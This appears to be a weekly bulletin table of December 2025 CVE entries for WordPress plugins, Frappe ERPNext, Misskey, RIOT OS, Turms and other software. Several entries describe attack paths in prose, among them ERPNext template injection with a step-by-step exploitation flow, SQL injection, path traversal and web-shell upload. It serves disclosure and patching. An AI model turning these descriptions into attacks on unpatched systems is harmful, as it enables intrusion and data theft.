| UserElements--Ultimate Member Widgets for Elementor | Insertion of Sensitive Information Into Sent Data vulnerability in UserElements Ultimate Member Widgets for Elementor ultimate-member-widgets-for-elementor allows Retrieve Embedded Sensitive Data.This issue affects Ultimate Member Widgets for Elementor: from n/a through <= 2.3. | 2025-12-18 | not yet calculated | CVE-2025-66116 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-member-widgets-for-elementor/vulnerability/wordpress-ultimate-member-widgets-for-elementor-plugin-2-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| Ays Pro--Easy Form | Missing Authorization vulnerability in Ays Pro Easy Form easy-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Form: from n/a through <= 2.7.8. | 2025-12-18 | not yet calculated | CVE-2025-66117 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-form/vulnerability/wordpress-easy-form-plugin-2-7-8-broken-access-control-vulnerability?_s_id=cve |
| BoldGrid--Sprout Clients | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldGrid Sprout Clients sprout-clients allows Reflected XSS.This issue affects Sprout Clients: from n/a through <= 3.2.1. | 2025-12-18 | not yet calculated | CVE-2025-66118 | https://vdp.patchstack.com/database/Wordpress/Plugin/sprout-clients/vulnerability/wordpress-sprout-clients-plugin-3-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Bob--Hostel | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bob Hostel hostel allows Reflected XSS.This issue affects Hostel: from n/a through <= 1.1.5.9. | 2025-12-18 | not yet calculated | CVE-2025-66119 | https://vdp.patchstack.com/database/Wordpress/Plugin/hostel/vulnerability/wordpress-hostel-plugin-1-1-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CatFolders--CatFolders | Missing Authorization vulnerability in CatFolders CatFolders catfolders allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CatFolders: from n/a through <= 2.5.3. | 2025-12-16 | not yet calculated | CVE-2025-66120 | https://vdp.patchstack.com/database/Wordpress/Plugin/catfolders/vulnerability/wordpress-catfolders-plugin-2-5-3-broken-access-control-vulnerability?_s_id=cve |
| SiteGround--SiteGround Security | Missing Authorization vulnerability in SiteGround SiteGround Security sg-security allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SiteGround Security: from n/a through <= 1.5.8. | 2025-12-16 | not yet calculated | CVE-2025-66121 | https://vdp.patchstack.com/database/Wordpress/Plugin/sg-security/vulnerability/wordpress-siteground-security-plugin-1-5-8-broken-access-control-vulnerability?_s_id=cve |
| Design--Stylish Price List | Missing Authorization vulnerability in Design Stylish Price List stylish-price-list allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Stylish Price List: from n/a through <= 7.2.2. | 2025-12-16 | not yet calculated | CVE-2025-66122 | https://vdp.patchstack.com/database/Wordpress/Plugin/stylish-price-list/vulnerability/wordpress-stylish-price-list-plugin-7-2-2-broken-access-control-vulnerability?_s_id=cve |
| ZEEN101--Leaky Paywall | Missing Authorization vulnerability in ZEEN101 Leaky Paywall leaky-paywall allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Leaky Paywall: from n/a through <= 4.22.5. | 2025-12-16 | not yet calculated | CVE-2025-66124 | https://vdp.patchstack.com/database/Wordpress/Plugin/leaky-paywall/vulnerability/wordpress-leaky-paywall-plugin-4-22-5-broken-access-control-vulnerability?_s_id=cve |
| Nitesh--Ultimate Auction | Insertion of Sensitive Information Into Sent Data vulnerability in Nitesh Ultimate Auction ultimate-auction allows Retrieve Embedded Sensitive Data. This issue affects Ultimate Auction: from n/a through <= 4.3.2. | 2025-12-16 | not yet calculated | CVE-2025-66125 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-auction/vulnerability/wordpress-ultimate-auction-plugin-4-3-2-sensitive-data-exposure-vulnerability?_s_id=cve |
| wowpress.host--Fix Media Library | Insertion of Sensitive Information Into Sent Data vulnerability in wowpress.host Fix Media Library wow-media-library-fix allows Retrieve Embedded Sensitive Data. This issue affects Fix Media Library: from n/a through <= 2.0. | 2025-12-16 | not yet calculated | CVE-2025-66126 | https://vdp.patchstack.com/database/Wordpress/Plugin/wow-media-library-fix/vulnerability/wordpress-fix-media-library-plugin-2-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| g5theme--Essential Real Estate | Missing Authorization vulnerability in g5theme Essential Real Estate essential-real-estate allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Essential Real Estate: from n/a through <= 5.2.2. | 2025-12-16 | not yet calculated | CVE-2025-66127 | https://vdp.patchstack.com/database/Wordpress/Plugin/essential-real-estate/vulnerability/wordpress-essential-real-estate-plugin-5-2-2-broken-access-control-vulnerability?_s_id=cve |
| Brevo--Sendinblue for WooCommerce | Missing Authorization vulnerability in Brevo Sendinblue for WooCommerce woocommerce-sendinblue-newsletter-subscription allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sendinblue for WooCommerce: from n/a through <= 4.0.49. | 2025-12-16 | not yet calculated | CVE-2025-66128 | https://vdp.patchstack.com/database/Wordpress/Plugin/woocommerce-sendinblue-newsletter-subscription/vulnerability/wordpress-sendinblue-for-woocommerce-plugin-4-0-49-broken-access-control-vulnerability?_s_id=cve |
| wppochipp--Pochipp | Missing Authorization vulnerability in wppochipp Pochipp pochipp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Pochipp: from n/a through <= 1.18.0. | 2025-12-16 | not yet calculated | CVE-2025-66129 | https://vdp.patchstack.com/database/Wordpress/Plugin/pochipp/vulnerability/wordpress-pochipp-plugin-1-18-0-broken-access-control-vulnerability?_s_id=cve |
| etruel--WP Views Counter | Missing Authorization vulnerability in etruel WP Views Counter wpecounter allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Views Counter: from n/a through <= 2.1.2. | 2025-12-16 | not yet calculated | CVE-2025-66130 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpecounter/vulnerability/wordpress-wp-views-counter-plugin-2-1-2-broken-access-control-vulnerability?_s_id=cve |
| yaadsarig--Yaad Sarig Payment Gateway For WC | Missing Authorization vulnerability in yaadsarig Yaad Sarig Payment Gateway For WC yaad-sarig-payment-gateway-for-wc allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Yaad Sarig Payment Gateway For WC: from n/a through <= 2.2.10. | 2025-12-16 | not yet calculated | CVE-2025-66131 | https://vdp.patchstack.com/database/Wordpress/Plugin/yaad-sarig-payment-gateway-for-wc/vulnerability/wordpress-yaad-sarig-payment-gateway-for-wc-plugin-2-2-10-broken-access-control-vulnerability?_s_id=cve |
| FAPI Business s.r.o.--FAPI Member | Authorization Bypass Through User-Controlled Key vulnerability in FAPI Business s.r.o. FAPI Member fapi-member allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects FAPI Member: from n/a through <= 2.2.26. | 2025-12-16 | not yet calculated | CVE-2025-66132 | https://vdp.patchstack.com/database/Wordpress/Plugin/fapi-member/vulnerability/wordpress-fapi-member-plugin-2-2-26-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| WP Legal Pages--WP Cookie Notice for GDPR, CCPA & ePrivacy Consent | Missing Authorization vulnerability in WP Legal Pages WP Cookie Notice for GDPR, CCPA & ePrivacy Consent gdpr-cookie-consent allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Cookie Notice for GDPR, CCPA & ePrivacy Consent: from n/a through <= 4.0.7. | 2025-12-16 | not yet calculated | CVE-2025-66133 | https://vdp.patchstack.com/database/Wordpress/Plugin/gdpr-cookie-consent/vulnerability/wordpress-wp-cookie-notice-for-gdpr-ccpa-eprivacy-consent-plugin-4-0-7-broken-access-control-vulnerability?_s_id=cve |
| NinjaTeam--FileBird Pro | Missing Authorization vulnerability in NinjaTeam FileBird Pro filebird-pro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects FileBird Pro: from n/a through <= 6.4.9. | 2025-12-16 | not yet calculated | CVE-2025-66134 | https://vdp.patchstack.com/database/Wordpress/Plugin/filebird-pro/vulnerability/wordpress-filebird-pro-plugin-6-4-9-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Coder for Elementor | Missing Authorization vulnerability in merkulove Coder for Elementor coder-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Coder for Elementor: from n/a through <= 1.0.13. | 2025-12-16 | not yet calculated | CVE-2025-66147 | https://vdp.patchstack.com/database/Wordpress/Plugin/coder-elementor/vulnerability/wordpress-coder-for-elementor-plugin-1-0-13-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Grider for Elementor | Missing Authorization vulnerability in merkulove Grider for Elementor grider-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Grider for Elementor: from n/a through <= 1.0.8. | 2025-12-16 | not yet calculated | CVE-2025-66161 | https://vdp.patchstack.com/database/Wordpress/Plugin/grider-elementor/vulnerability/wordpress-grider-for-elementor-plugin-1-0-8-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Spoter for Elementor | Missing Authorization vulnerability in merkulove Spoter for Elementor spoter-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Spoter for Elementor: from n/a through <= 1.04. | 2025-12-16 | not yet calculated | CVE-2025-66162 | https://vdp.patchstack.com/database/Wordpress/Plugin/spoter-elementor/vulnerability/wordpress-spoter-for-elementor-plugin-1-04-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Masker for Elementor | Missing Authorization vulnerability in merkulove Masker for Elementor masker-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Masker for Elementor: from n/a through <= 1.1.4. | 2025-12-16 | not yet calculated | CVE-2025-66163 | https://vdp.patchstack.com/database/Wordpress/Plugin/masker-elementor/vulnerability/wordpress-masker-for-elementor-plugin-1-1-4-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Laser | Missing Authorization vulnerability in merkulove Laser laser allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Laser: from n/a through <= 1.1.1. | 2025-12-16 | not yet calculated | CVE-2025-66164 | https://vdp.patchstack.com/database/Wordpress/Plugin/laser/vulnerability/wordpress-laser-plugin-1-1-1-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Lottier for WPBakery | Missing Authorization vulnerability in merkulove Lottier for WPBakery lottier-wpbakery allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Lottier for WPBakery: from n/a through <= 1.1.7. | 2025-12-16 | not yet calculated | CVE-2025-66165 | https://vdp.patchstack.com/database/Wordpress/Plugin/lottier-wpbakery/vulnerability/wordpress-lottier-for-wpbakery-plugin-1-1-7-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Lottier for Elementor | Missing Authorization vulnerability in merkulove Lottier for Elementor lottier-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Lottier for Elementor: from n/a through <= 1.0.9. | 2025-12-16 | not yet calculated | CVE-2025-66166 | https://vdp.patchstack.com/database/Wordpress/Plugin/lottier-elementor/vulnerability/wordpress-lottier-for-elementor-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Lottier | Missing Authorization vulnerability in merkulove Lottier lottier-gutenberg allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Lottier: from n/a through <= 1.1.1. | 2025-12-16 | not yet calculated | CVE-2025-66167 | https://vdp.patchstack.com/database/Wordpress/Plugin/lottier-gutenberg/vulnerability/wordpress-lottier-plugin-1-1-1-broken-access-control-vulnerability?_s_id=cve |
| Inaba Denki Sangyo Co., Ltd.--CHOCO TEI WATCHER mini (IB-MCT001) | CHOCO TEI WATCHER mini (IB-MCT001) contains an issue with improper check for unusual or exceptional conditions. When the Video Download feature is in a specific communication state, the product's resources may be consumed abnormally. | 2025-12-16 | not yet calculated | CVE-2025-66357 | https://www.inaba.co.jp/files/chocomini_vulnerability_newly_identified.pdf https://jvn.jp/en/vu/JVNVU92827367/ |
| Apache Software Foundation--Apache Airflow | A vulnerability in Apache Airflow allowed authenticated UI users to view secret values in rendered templates due to secrets not being properly redacted, potentially exposing secrets to users without the appropriate authorization. Users are recommended to upgrade to version 3.1.4, which fixes this issue. | 2025-12-15 | not yet calculated | CVE-2025-66388 | https://github.com/apache/airflow/pull/58772 https://lists.apache.org/thread/mv9hzsx8grjf7gdlkxwppnpbtogtls2g |
| misskey-dev--misskey | Misskey is an open source, federated social media platform. Starting in version 13.0.0-beta.16 and prior to version 2025.12.0, an actor who does not have permission to view favorites or clips can export the posts and view their contents. Version 2025.12.0 fixes the issue. | 2025-12-15 | not yet calculated | CVE-2025-66402 | https://github.com/misskey-dev/misskey/security/advisories/GHSA-496g-mmpw-j9x3 https://github.com/misskey-dev/misskey/commit/dc77d59f8712d3fe0b73cd4af2035133839cd57b |
| Frappe ERPNext--Frappe ERPNext | An SSTI (Server-Side Template Injection) vulnerability exists in the get_dunning_letter_text method of Frappe ERPNext through 15.89.0. The function renders attacker-controlled Jinja2 templates (body_text) using frappe.render_template() with a user-supplied context (doc). Although Frappe uses a custom SandboxedEnvironment, several dangerous globals such as frappe.db.sql are still available in the execution context via get_safe_globals(). An authenticated attacker with access to configure Dunning Type and its child table Dunning Letter Text can inject arbitrary Jinja expressions, resulting in server-side code execution within a restricted but still unsafe context. This can leak database information. | 2025-12-15 | not yet calculated | CVE-2025-66434 | https://www.notion.so/SSTI-bug-1-239e6086eadc8096bfcfe90551a3a483?source=copy_link https://iamanc.github.io/post/erpnext-ssti-bug-1 |
| Frappe ERPNext--Frappe ERPNext | An SSTI (Server-Side Template Injection) vulnerability exists in the get_contract_template method of Frappe ERPNext through 15.89.0. The function renders attacker-controlled Jinja2 templates (contract_terms) using frappe.render_template() with a user-supplied context (doc). Although Frappe uses a custom SandboxedEnvironment, several dangerous globals such as frappe.db.sql are still available in the execution context via get_safe_globals(). An authenticated attacker with access to create or modify a Contract Template can inject arbitrary Jinja expressions into the contract_terms field, resulting in server-side code execution within a restricted but still unsafe context. This vulnerability can be used to leak database information. | 2025-12-15 | not yet calculated | CVE-2025-66435 | https://www.notion.so/SSTI-bug-2-239e6086eadc80878e8fcc7b6c26a584?source=copy_link https://iamanc.github.io/post/erpnext-ssti-bug-2 |
| Frappe ERPNext--Frappe ERPNext | An SSTI (Server-Side Template Injection) vulnerability exists in the get_terms_and_conditions method of Frappe ERPNext through 15.89.0. The function renders attacker-controlled Jinja2 templates (terms) using frappe.render_template() with a user-supplied context (doc). Although Frappe uses a custom SandboxedEnvironment, several dangerous globals such as frappe.db.sql are still available in the execution context via get_safe_globals(). An authenticated attacker with access to create or modify a Terms and Conditions document can inject arbitrary Jinja expressions into the terms field, resulting in server-side code execution within a restricted but still unsafe context. This vulnerability can be used to leak database information. | 2025-12-15 | not yet calculated | CVE-2025-66436 | https://www.notion.so/SSTI-bug-3-239e6086eadc8020aeecdaf123e32f3d?source=copy_link https://iamanc.github.io/post/erpnext-ssti-bug-3 |
| Frappe ERPNext--Frappe ERPNext | An SSTI (Server-Side Template Injection) vulnerability exists in the get_address_display method of Frappe ERPNext through 15.89.0. This function renders address templates using frappe.render_template() with a context derived from the address_dict parameter, which can be either a dictionary or a string referencing an Address document. Although ERPNext uses a custom Jinja2 SandboxedEnvironment, dangerous functions like frappe.db.sql remain accessible via get_safe_globals(). An authenticated attacker with permission to create or modify an Address Template can inject arbitrary Jinja expressions into the template field. By creating an Address document with a matching country, and then calling the get_address_display API with address_dict="address_name", the system will render the malicious template using attacker-controlled data. This leads to server-side code execution or database information disclosure. | 2025-12-15 | not yet calculated | CVE-2025-66437 | https://www.notion.so/SSTI-bug-4-239e6086eadc80aa9331fba874c674a5?source=copy_link https://iamanc.github.io/post/erpnext-ssti-bug-4 |
| Frappe ERPNext--Frappe ERPNext | A Server-Side Template Injection (SSTI) vulnerability exists in the Frappe ERPNext through 15.89.0 Print Format rendering mechanism. Specifically, the API frappe.www.printview.get_html_and_style() triggers the rendering of the html field inside a Print Format document using frappe.render_template(template, doc) via the get_rendered_template() call chain. Although ERPNext wraps Jinja2 in a SandboxedEnvironment, it exposes sensitive functions such as frappe.db.sql through get_safe_globals(). An authenticated attacker with permission to create or modify a Print Format can inject arbitrary Jinja expressions into the html field. Once the malicious Print Format is saved, the attacker can call get_html_and_style() with a target document (e.g., Supplier or Sales Invoice) to trigger the render process. This leads to information disclosure from the database, such as database version, schema details, or sensitive values, depending on the injected payload. Exploitation flow: Create a Print Format with SSTI payload in the html field; call the get_html_and_style() API; triggers frappe.render_template(template, doc) inside get_rendered_template(); leaks database information via frappe.db.sql or other exposed globals. | 2025-12-15 | not yet calculated | CVE-2025-66438 | https://www.notion.so/SSTI-bug-5-239e6086eadc80a48f17c1257a604d2c?source=copy_link https://iamanc.github.io/post/erpnext-ssti-bug-5 |
| Frappe ERPNext--Frappe ERPNext | An issue was discovered in Frappe ERPNext through 15.89.0. The function get_outstanding_reference_documents() in erpnext/accounts/doctype/payment_entry/payment_entry.py is vulnerable to SQL injection. It allows an attacker to extract arbitrary data from the database by injecting SQL payloads via the from_posting_date parameter, which is interpolated directly into the query without sanitization or parameter binding. | 2025-12-15 | not yet calculated | CVE-2025-66439 | https://github.com/frappe/frappe/security https://iamanc.github.io/post/erpnext-sqli |
| Frappe ERPNext--Frappe ERPNext | An issue was discovered in Frappe ERPNext through 15.89.0. The function get_outstanding_reference_documents() in erpnext/accounts/doctype/payment_entry/payment_entry.py is vulnerable to SQL injection. It allows an attacker to extract arbitrary data from the database by injecting SQL payloads via the to_posting_date parameter, which is interpolated directly into the query without sanitization or parameter binding. | 2025-12-15 | not yet calculated | CVE-2025-66440 | https://github.com/frappe/frappe/security https://iamanc.github.io/post/erpnext-sqli |
| misskey-dev--misskey | Misskey is an open source, federated social media platform. Attackers who connect through an untrusted reverse proxy, or directly with no reverse proxy at all, can bypass IP rate limiting by adding a forged X-Forwarded-For header. Starting with version 2025.9.1, a `trustProxy` option was added to the config file to prevent this. However, before version 2025.12.0-alpha.2 it was initialized with an insecure default value, so an instance remains vulnerable if the option is not set explicitly. This is patched in v2025.12.0-alpha.2 by flipping the default value of `trustProxy` to `false`. Operators behind a trusted reverse proxy who are unsure whether they manually overrode this value should check their config for the intended behaviour. Instances running Misskey behind a trusted reverse proxy should not be affected by this vulnerability. From v2025.9.1 to v2025.11.1, a workaround is available: set `trustProxy: false` in the config file. | 2025-12-15 | not yet calculated | CVE-2025-66482 | https://github.com/misskey-dev/misskey/security/advisories/GHSA-wwrj-3hvj-prpm https://github.com/misskey-dev/misskey/commit/5512898463fa8487b9e6488912f35102b91f25f7 |
| Apache Software Foundation--Apache NiFi | Apache NiFi 1.20.0 through 2.6.0 include the GetAsanaObject Processor, which requires integration with a configurable Distributed Map Cache Client Service for storing and retrieving state information. The GetAsanaObject Processor used generic Java Object serialization and deserialization without filtering. Unfiltered Java object deserialization provides no protection against crafted state information stored in the cache server configured for GetAsanaObject. Exploitation requires an Apache NiFi system running with the GetAsanaObject Processor, and direct access to the configured cache server. Upgrading to Apache NiFi 2.7.0 is the recommended mitigation; it replaces Java Object serialization with JSON serialization. Removing the GetAsanaObject Processor, located in the nifi-asana-processors-nar bundle, also prevents exploitation. | 2025-12-19 | not yet calculated | CVE-2025-66524 | https://lists.apache.org/thread/k9h004ydjg7opdvxr0nfywtzf33z60d7 |
| SEIKO EPSON CORPORATION--Web Config | Stack-based buffer overflow vulnerability exists in SEIKO EPSON Web Config. Specially crafted data input by a logged-in user may execute arbitrary code. As for the details of the affected products and versions, see the information provided by the vendor under [References]. | 2025-12-16 | not yet calculated | CVE-2025-66635 | https://www.epson.jp/support/misc_t/251216_oshirase.htm https://epson.com/Support/wa00971 https://jvn.jp/en/jp/JVN51846148/ |
| RIOT-OS--RIOT | RIOT is an open-source microcontroller operating system, designed to match the requirements of Internet of Things (IoT) devices and other embedded devices. A vulnerability was discovered in the IPv6 fragmentation reassembly implementation of RIOT OS v2025.07. When receiving a fragmented IPv6 packet with fragment offset 0 and an empty payload, the payload pointer is set to NULL. However, the implementation still tries to copy the payload into the reassembly buffer, resulting in a NULL pointer dereference which crashes the OS (DoS). To trigger the vulnerability, the `gnrc_ipv6_ext_frag` module must be enabled and the attacker must be able to send arbitrary IPv6 packets to the victim. RIOT OS v2025.10 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-66646 | https://github.com/RIOT-OS/RIOT/security/advisories/GHSA-v8gx-q9m6-5xm9 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L411 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L420 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L490 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L532 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L534 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L544 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/pktbuf_static/gnrc_pktbuf_static.c#L150C1-L150C76 https://github.com/RIOT-OS/RIOT/releases/tag/2025.10 https://github.com/user-attachments/files/23903992/reproducer_1.zip |
| RIOT-OS--RIOT | RIOT is an open-source microcontroller operating system, designed to match the requirements of Internet of Things (IoT) devices and other embedded devices. A vulnerability was discovered in the IPv6 fragmentation reassembly implementation of RIOT OS v2025.07. When copying the contents of the first fragment (offset=0) into the reassembly buffer, no size check is performed. It is possible to force the creation of a small reassembly buffer by first sending a shorter fragment (also with offset=0). Overflowing the reassembly buffer corrupts the state of other packet buffers, which an attacker might be able to use to achieve further memory corruption (potentially resulting in remote code execution). To trigger the vulnerability, the `gnrc_ipv6_ext_frag` module must be included and the attacker must be able to send arbitrary IPv6 packets to the victim. Version 2025.10 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-66647 | https://github.com/RIOT-OS/RIOT/security/advisories/GHSA-wh3v-q6vr-j79r https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L411 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L481 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L532 https://github.com/RIOT-OS/RIOT/blob/eb65305cf9f1b7affb50b17af5c12341b83a8636/sys/net/gnrc/network_layer/ipv6/ext/frag/gnrc_ipv6_ext_frag.c#L544 https://github.com/RIOT-OS/RIOT/releases/tag/2025.10 |
| grav--Java | grav before v1.7.49.5 has a Stored Cross-Site Scripting (Stored XSS) vulnerability in the page editing functionality. An authenticated low-privileged user with permission to edit content can inject malicious JavaScript payloads into editable fields. The payload is stored on the server and later executed when any other user views or edits the affected page. | 2025-12-15 | not yet calculated | CVE-2025-66843 | https://github.com/Yohane-Mashiro/grav_cve/issues/1 |
| grav--Java | In grav before 1.7.49.5, an SSRF (Server-Side Request Forgery) vector may be triggered via Twig templates when page content is processed by Twig and the configuration allows undefined PHP functions to be registered. | 2025-12-15 | not yet calculated | CVE-2025-66844 | https://github.com/Yohane-Mashiro/grav_cve/issues/2 |
| tkFile--Take Web | The Takes web framework's TkFiles take through 2.0-SNAPSHOT fails to canonicalize HTTP request paths before resolving them against the filesystem. A remote attacker can include ../ sequences in the request path to escape the configured base directory and read arbitrary files from the host system. | 2025-12-19 | not yet calculated | CVE-2025-66905 | https://github.com/yegor256/takes https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66905_report.md |
| SNAPSHOT--SNAPSHOT | A Cross-Site Request Forgery (CSRF) vulnerability in the Turms Admin API through v0.10.0-SNAPSHOT allows attackers to gain escalated privileges. | 2025-12-19 | not yet calculated | CVE-2025-66906 | https://github.com/turms-im/turms https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66906_report.md |
| SNAPSHOT--SNAPSHOT | Turms AI-Serving module v0.10.0-SNAPSHOT and earlier contains an improper file type validation vulnerability in the OCR image upload functionality. The OcrController in turms-ai-serving/src/main/java/im/turms/ai/domain/ocr/controller/OcrController.java uses the @FormData(contentType = MediaTypeConst.IMAGE) annotation to restrict uploads to image files, but this constraint is not properly enforced. The system relies solely on client-provided Content-Type headers and file extensions without validating actual file content using magic bytes (file signatures). An attacker can upload arbitrary file types including executables, scripts, HTML, or web shells by setting the Content-Type header to "image/*" or using an image file extension. This bypass enables potential server-side code execution, stored XSS, or information disclosure depending on how uploaded files are processed and served. | 2025-12-19 | not yet calculated | CVE-2025-66908 | https://github.com/turms-im/turms https://github.com/turms-im/turms/blob/develop/turms-ai-serving/src/main/java/im/turms/ai/domain/ocr/controller/OcrController.java https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66908_report.md |
| SNAPSHOT--SNAPSHOT | Turms AI-Serving module v0.10.0-SNAPSHOT and earlier contains an image decompression bomb denial of service vulnerability. The ExtendedOpenCVImage class in ai/djl/opencv/ExtendedOpenCVImage.java loads images using OpenCV's imread() function without validating dimensions or pixel count before decompression. An attacker can upload a specially crafted compressed image file (e.g., PNG) that is small when compressed but expands to gigabytes of memory when loaded. This causes immediate memory exhaustion, OutOfMemoryError, and service crash. No authentication is required if the OCR service is publicly accessible. Multiple requests can completely deny service availability. | 2025-12-19 | not yet calculated | CVE-2025-66909 | https://github.com/turms-im/turms https://github.com/turms-im/turms/blob/develop/turms-ai-serving/src/main/java/ai/djl/opencv/ExtendedOpenCVImage.java#L37 https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66909_report.md |
| SNAPSHOT--SNAPSHOT | Turms Server v0.10.0-SNAPSHOT and earlier contains a plaintext password storage vulnerability in the administrator authentication system. The BaseAdminService class caches administrator passwords in plaintext within AdminInfo objects to optimize authentication performance. Upon successful login, raw passwords are stored unencrypted in memory in the rawPassword field. Attackers with local system access can extract these passwords through memory dumps, heap analysis, or debugger attachment, bypassing bcrypt protection. | 2025-12-19 | not yet calculated | CVE-2025-66910 | https://github.com/turms-im/turms https://github.com/turms-im/turms/blob/develop/turms-server-common/src/main/java/im/turms/server/common/domain/admin/bo/AdminInfo.java#L34 https://github.com/turms-im/turms/blob/develop/turms-server-common/src/main/java/im/turms/server/common/domain/admin/service/BaseAdminService.java#L237 https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66910_report.md |
| SNAPSHOT--SNAPSHOT | Turms IM Server v0.10.0-SNAPSHOT and earlier contains a broken access control vulnerability in the user online status query functionality. The handleQueryUserOnlineStatusesRequest() method in UserServiceController.java allows any authenticated user to query the online status, device information, and login timestamps of arbitrary users without proper authorization checks. | 2025-12-19 | not yet calculated | CVE-2025-66911 | https://github.com/turms-im/turms https://github.com/turms-im/turms/blob/develop/turms-service/src/main/java/im/turms/service/domain/user/access/servicerequest/controller/UserServiceController.java#L239 https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66911_report.md |
| Point of Sale--Open Source | A Cross-site scripting (XSS) vulnerability in Create/Update Item(s) Module in Open Source Point of Sale v3.4.1 allows remote attackers to inject arbitrary web script or HTML via the "name" parameter. | 2025-12-17 | not yet calculated | CVE-2025-66921 | https://github.com/opensourcepos/opensourcepos https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66921/readme.md |
| Point of Sale--Open Source | A Cross-site scripting (XSS) vulnerability in Create/Update Customer(s) in Open Source Point of Sale v3.4.1 allows remote attackers to inject arbitrary web script or HTML via the phone_number parameter. | 2025-12-17 | not yet calculated | CVE-2025-66923 | https://github.com/opensourcepos/opensourcepos https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66923/readme.md |
| Point of Sale--Open Source | A Cross-site scripting (XSS) vulnerability in Create/Update Item Kit(s) in Open Source Point of Sale v3.4.1 allows remote attackers to inject arbitrary web script or HTML via the "name" parameter. | 2025-12-17 | not yet calculated | CVE-2025-66924 | https://github.com/opensourcepos/opensourcepos https://github.com/omkaryepre/vulnerability-research/blob/main/CVE-2025-66924/readme.md |
| Power Contril--Uplink | A CSRF vulnerability in the Narda-MITEQ Uplink Power Control Unit UPC2 v1.17 allows a remote attacker to execute arbitrary code via the web-based management interface, specifically the /system_setup.htm, /set_clock.htm, /receiver_setup.htm, /cal.htm?..., and /channel_setup.htm endpoints. | 2025-12-17 | not yet calculated | CVE-2025-66953 | https://www.nardamiteq.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-66953%20_%20narda%20miteq%20Uplink%20Power%20Contril%20Unitl%20UPC2%20_%20CSRF |
| Hitron--Hitron | An issue in Hitron HI3120 v7.2.4.5.2b1 allows a local attacker to obtain sensitive information via the Logout option in index.html (insufficient session expiration). | 2025-12-15 | not yet calculated | CVE-2025-66963 | http://hitron.com https://github.com/kakarotossj3/CVEs/blob/main/Hitron/Insufficient%20Session%20Expiration/Details |
